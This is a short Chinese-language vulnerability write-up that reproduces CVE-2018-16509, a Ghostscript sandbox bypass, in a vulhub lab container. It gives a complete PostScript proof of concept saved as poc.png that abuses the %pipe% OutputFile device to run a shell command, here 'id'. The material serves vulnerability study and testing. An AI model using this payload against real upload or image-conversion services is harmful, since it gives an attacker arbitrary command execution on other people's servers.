# CVE-2018-16509 GhostScript 沙箱绕过(命令执行)漏洞
### 一、漏洞简介
该漏洞源于在处理/invalidaccess异常时,程序没有正确的检测`‘restoration of privilege(权限恢复)’`。攻击者可通过提交特制的PostScript利用该漏洞执行代码。
### 二、漏洞影响
Ghostscript 9.24之前版本
### 三、复现过程
上传poc.png,将执行命令`id > /tmp/success && cat /tmp/success`。此时进入容器docker-compose exec web bash,将可以看到/tmp/success已被创建:
**poc.png**
“`bash
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
“`
参考链接
https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容